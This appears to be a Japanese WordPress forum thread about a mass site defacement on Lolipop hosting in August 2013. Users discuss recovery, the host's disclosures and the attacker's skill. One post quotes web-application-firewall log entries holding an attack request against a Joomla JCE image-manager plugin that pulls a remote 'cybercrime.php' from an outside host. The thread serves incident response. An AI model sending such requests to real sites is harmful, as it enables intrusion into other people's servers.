サイト改ざん?
-
サイトが急に文字化けになり、困っております;;
Hacked by Krad Xinと黒の上部ツールバーにあり、サイトが改ざんされてしまったのでしょうか?私の環境です。
PHP:バージョン3.4.9 MySQL:バージョン5.1.34
MySQL の文字セット:UTF-8 Unicode
使用しているブラウザ名称とそのバージョン (Windows XP Internet Explorer 8)
WordPress 3.6 を使用中
使用テーマ http://www.dessign.net/ultra-grid-theme/
Ultra Grid Themeを利用しています。
http://angedeverre.info/
私のサイトです。
(世話役追記:改ざんされた可能性のあるサイトです。アクセスされる方は十分にご注意ください。)直すための参考になるページなどありましたら教えてください><
宜しくお願いいたします。
-
ということはたぶん.htaccessの問題なので、バックアップ取った上で一度削除してください
TOPページ以外のリンクがすべて404エラーになったので、上記の方のようにパーマネントリンクをデフォルトに戻しました。
デバッグのログを確認してみます。ありがとうございます。odysseyさん
>>Rest in peace。
>>安らかに眠れ、ってことですね。
>>つまりまぁそういうことです。私も、つまりまぁそういう事だと思います(笑)
R.I.Pはよく使われる略語でもありますからね。hissyさん
すみません、お騒がせいたしました、今となっては別段数などどうでもよくなりました(笑)今回の件、私の方で、GMOさんや、あるいは技術的な側面とは異なった視点からまとめてみています。
※別に広告とかも入れているわけでは無いためにサイトへのアクセスを募る目的は全くありませんので(笑)
錯綜する情報をまとめるため引き続き Codex のロリポップサイト改ざん関連情報 (2013年8月) ページについて更新中です。
リリース内には『「当社のパーミッションの設定不備を利用」されたことが原因』ともありますが、侵入経路は WordPress のプラグイン・テーマの脆弱性だったとのとで、信頼できるソースからの最新版へのアップグレードを推奨します(プラグイン名・テーマ名などについては現時点では公開されていません)。サーバー側の設定については現在緊急メンテナンスなどで対応が進みつつあるようです。
各サイトの復旧に関してはここまでのこのスレッドの内容などが参考になるかと思いますが、データベース内のデータについてはロリポップ側でもスキャンなどは行っていないようですので攻撃前のバックアップがあれば差分チェックやロールバックを検討してください。
その他、上記 Codex ページのリンクなどを参考にしてください。また、編集のご協力・間違いの指摘などもありましたらどうぞ。
話がそれてしまって申し訳ないのですが、ちょっと気になったので念のため記載させて頂きます。
私もロリポップを使っているのですが、以前からWebアプリケーションファイアウォールを有効にしていたためか幸いな事に現在までクラッキングの被害にはあっていません。
で、今回のクラッキングとの因果関係があるかどうか不明なのですが、
8月28日の時点でWAFに検知ログが記録されていたため、一部を変更して記載させて頂きます。
前述した通り、関連性が全く不明なため、あくまで私の環境でこんなのありましたという報告ですみません。【ロリポップWAFのログ】
日時:2013/08/28 00:09:43
URL:[私のWPサイトのドメイン]/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://xxxxxx.com.yyyyyyyyy.es/cybercrime.php
アクセス元IP:178.33.178.xx日時:2013/08/28 00:37:01
URL:[私のWPサイトのドメイン]/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://xxxxxx.com.yyyyyyyyy.es/cybercrime.php
アクセス元IP:195.228.156.xxロリポップのWAFのログは7日分しか残らないため、以前にも同様のアクセスがあったかは不明です。
私の環境では8月24日から8月27日までの間には何も記録されておらず、8月28日に上記のログだけ記録されている状況です。「plugin=imgmanager」というクエリがちょっと気になります。
ロリポップには脆弱性があったというプラグイン名・テーマ名を教えてもらえると有り難いところですが。無理かな。にしてもcybercrime.phpって ^^;
ロリポップには脆弱性があったというプラグイン名・テーマ名を教えてもらえると有り難いところですが。無理かな。
私もロリポップを借りているので、この部分について問い合わせを出しているのですが、まだ自動返信メールしか来てないですね。
他のサーバーで利用しているWordPressユーザーすべてに影響が出かねないと思っているので、明らかになればこちらに転載するつもりなのですが。Crazyboneのログありますが必要でしょうか?
といっても、私のサイト(ロリポ)は、今のところ無事ですし、8/27以降は私以外のアクセスはないので、今回の件と関係あるかどうかは不明ですが。。。当初から最初の侵入経路はtimthumb.phpだろうと思っていましたが…、t.okuboさんの情報提供で疑念は決定的になりました。
takeru0.0さん
>>Crazyboneのログありますが必要でしょうか?
>>といっても、私のサイト(ロリポ)は、今のところ無事ですし、8/27以降は私以外のアクセスはないので、今回の件と関係あるかどうかは不明ですが。。。あまり、そういったログの開示はされない方が良いと思います。
ログが模倣したりするためのヒントになってしまう場合も出てきますからね。hissyさん
も、あるんですけど、さくらインターネットの田中さんがあまり書いて欲しくなかったことツィートされています。(;´Д`)http://blog.hanzai.jp/essential-problem-of-lollipop.html
だけでは無いんですけどね・・・。
> internet-pollutionsさん
書いた欲しくなかったこととは、どれでしょうか?>>hissy さん
あ、ここでの話ではありませんよ、すみません、勘違いさせちゃったかも判りません。
「書いて欲しくなかった」は、上記のURLに少しイラッとしたので貼り付けてある、さくらインターネットの社長の田中さんのツィートの事なんです。
まあ、書く前に直接ツィッターで田中さんには言いましたけどね。でも、ある意味、GMOさんは、WPを悪者にでもする気なのかな?とかさえ思っていたので、ちょうど良かったと言えばちょうど良かったのはありますけどね。
彼らが行っている「コンテスト」の対象ってユニークなIPアドレスである事は、実際に彼らのコンテスト会場などを見られた方もあると思うので、判ると思うんです。
なのに、どうしてGMOグループに目を付けて、特別に調子に乗ったことをFacebookなどでも書いているかと言うことなんです。
それ一つとってみても、「なめられるようなサーバ群」であると見抜かれてしまったと言う事なんです。
彼がFacebook上で、2900+ (maybe)とか書いていたのは、単にホスト名を割り出せた数の内、「彼が得意な脆弱性」を検知することができた数だと思うんです。
しかしこういった事って、皆さん access.log ばかり見る傾向にあると思うんですけど、セキュリティに本当に大切なのは、error.log であったり、イレギュラーなlogの早期発見なんですよね。
それらを管理・監視することによって、例えはじめは見る人が見れば、穴だらけであっても相当な可能性を潰していく事ができるんですけどね・・・。
http://lolipop.jp/info/news/4149/
予定よりも、1時間ほど遅れてまた、情報開示が行われたようです。
何とも手際が悪いというか・・・。t.okuboさん
「plugin=imgmanager」は、Joomla site の際に使用されることが多いqueryです。
つまり、CMSに何が使われているのか Check Crawlerの類いが残したlogだと思いますよ。gatespaceさん
plugin や theme であれば、WordPressの公式siteからinstallしているものであれば、早々に大きな心配をされる必要は無いと思います。
新しいモノ喰いを行った所で、WordPressは世界中で使われており、基本的にOpen Sourceでもあるわけで、何か問題があればすぐに誰かからツッコミがなされて修正されていきますからね。
また、未知のレアな脆弱性があった所で、それを突かれて今回同様の被害に遭われる可能性はよほどの有名サイトか、執着心を持って狙われるかでないと限りなく0に近いと言えると思います。
2つ上の書き込みに補足(の方が長いw)しておきます。
「ユニークなIPアドレス」がコンテストの対象であると言う事は書いていますし、ご覧になった方も多いと思うんです。これ、どういう事かと言うと、ロリポップ契約されている方には失礼な言い方になってしまいますけど、名前ベースのバーチャルホストに重要なサイトは無いって解釈から、ユニークなIPアドレスしか「対象」になっていないんだと思います。
そして、もう一つ言える事は、私の所でも「迷惑メール壊滅」させようとして、本来立ち上げているサイトなんですけど、そこではかなり「彼たちに近いとも言えるような事」やっています。
もちろん、彼たちみたいに「悪さ」などはするつもりもありません。
「近い事」というのは、正引きでのホスト名の収集と言う事で、1つのIPアドレスに割り当てられているホスト名の検出だけをさしています。ホスト名が判っていれば、IPアドレスの割り出しは、nslookup 等のコマンドでもカンタンにできるわけですけど、逆は、相当にめんどくさい話になってくるわけです。
例えば、29日のAM4:00頃までの改ざんされたサイトの確認が出来た数が、GMOグループさん分だけで、225確認できたわけです。
それらに、割り当てられていたIPアドレスの数というのは、ロリポップさん名義が5個、GMOインターネット名義が5個と、合計10個のIPアドレスだったわけです。
それらの内の1IP分の14サイト分については、おそらくDNSの状況から見て、GMOインターネットさんの契約者であろうと思っています。
それら、たった10個に割り当てられている名前ベースのホスト数は、私の所で確認できているだけでも、14,000ほどあります。
参考:http://blog.hanzai.jp/gmo-tampering-incident-4.htmlつまり、彼は目を付けたのは良いけど、そういったNW的なスキルには欠けていると言う事も言えると思っています。
誇らしげに、Facebook上で、2900+ (maybe)とか書いていましたけど、自らの非力さを語っているようなものだと思います。
ロリポップさんが、契約者数ウェブ上で公表しているのは皆さんもご存じだと思いますけど、目を付けたのであれば、その数からも私が言っていることは判ると思います。
また、cidr ベースで言えば、GMOインターネットさんの名義のモノだって、今回の10個のIPの内、半分の5個がそうだったわけです。
そしたら、そっちにまで踏み出しているのであれば、本来はロリポップさん120万+GMOインターネット分とならないとおかしいわけで、そうするとさらに、ターゲット総数は増えて軽く200万を越えるホスト数が対象となるはずですからね。
それを、2900+ (maybe)とか言っているので、「自らの非力ぶりを披露してんじゃねぇ」って、私は思っているわけです。
そして、もう一つは今回の件で多数のサイト等で確認できた、t.okuboさんが出されているようなlog も多数確認しています。
それらの情報を寄せ集めて判断すると、いわゆる Script Kiddy or Wannabe の類いであろうとしか私は思っていないんです。
- トピック「サイト改ざん?」には新たに返信することはできません。